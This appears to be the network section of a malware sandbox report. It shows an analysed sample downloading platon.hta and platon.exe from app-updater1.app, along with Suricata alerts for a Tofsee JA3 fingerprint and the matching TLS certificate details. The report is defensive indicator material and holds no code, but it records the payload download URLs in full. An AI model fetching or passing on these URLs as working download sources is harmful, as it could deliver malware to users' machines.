Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
app-updater1.app | 172.67.217.156 |
GET
200
https://app-updater1.app/api/getFile?fn=platon.hta
REQUEST
RESPONSE
BODY
GET /api/getFile?fn=platon.hta HTTP/1.1
Host: app-updater1.app
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Apr 2025 00:59:15 GMT
Content-Type: application/hta
Content-Length: 265306
Connection: keep-alive
Content-Disposition: attachment; filename=platon.hta; filename*=UTF-8''platon.hta
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cncTgRmYbT5htXWT2AndgUe1nrIsRuz9i1IA7LZT5uQFzDsi65HJGcEGN2M09PnR9h1vJ2jmKWV4mkHglX5IAG7pMYmc9Gk8mOLL%2Baov3w%2FrjuL6kZqnDaQ555jWOMpDgL%2FR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 92acdcad7904ff01-PDX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=144795&min_rtt=134809&rtt_var=57741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=371&delivery_rate=21660&cwnd=33&unsent_bytes=0&cid=e155d215474acbb3&ts=703&x=0"
GET
200
https://app-updater1.app/api/getFile?fn=platon.hta
REQUEST
RESPONSE
BODY
GET /api/getFile?fn=platon.hta HTTP/1.1
Accept: */*
Accept-Language: ko-KR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: app-updater1.app
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Apr 2025 00:59:18 GMT
Content-Type: application/hta
Content-Length: 265306
Connection: keep-alive
Content-Disposition: attachment; filename=platon.hta; filename*=UTF-8''platon.hta
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQ5sYUSCZy%2FCvIFsBkxY8lwhuz%2BmeHE79y3zw8%2F91Jfj0ZVucUEYPLZjb%2FSbivceMbB9yk2wPJk0zHvnsHIoQvMoYTI8Tb1Zcb1KZuyfBTwotz%2BhF3tx2gCVhiGWpGb4gaT6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 92acdcbd9a5f2f9c-PDX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=170339&min_rtt=159866&rtt_var=64893&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=643&delivery_rate=18265&cwnd=33&unsent_bytes=0&cid=e9bdcf2968bb4065&ts=749&x=0"
GET
200
https://app-updater1.app/api/getFile?fn=platon.exe
REQUEST
RESPONSE
BODY
GET /api/getFile?fn=platon.exe HTTP/1.1
Host: app-updater1.app
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 04 Apr 2025 00:59:24 GMT
Content-Type: application/vnd.microsoft.portable-executable
Content-Length: 252416
Connection: keep-alive
Server: cloudflare
Content-Disposition: attachment; filename=platon.exe; filename*=UTF-8''platon.exe
Cf-Cache-Status: DYNAMIC
CF-RAY: 92acdce59bc94618-DFW
alt-svc: h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49178 -> 104.21.83.80:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49171 -> 104.21.83.80:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49174 -> 104.21.83.80:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49178 104.21.83.80:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=app-updater1.app | 26:9f:0d:9b:d2:44:1e:72:9c:a8:cf:f9:d3:cd:04:62:10:67:ac:cd |
TLSv1 192.168.56.101:49171 104.21.83.80:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=app-updater1.app | 26:9f:0d:9b:d2:44:1e:72:9c:a8:cf:f9:d3:cd:04:62:10:67:ac:cd |
TLSv1 192.168.56.101:49174 104.21.83.80:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=app-updater1.app | 26:9f:0d:9b:d2:44:1e:72:9c:a8:cf:f9:d3:cd:04:62:10:67:ac:cd |
Snort Alerts
No Snort Alerts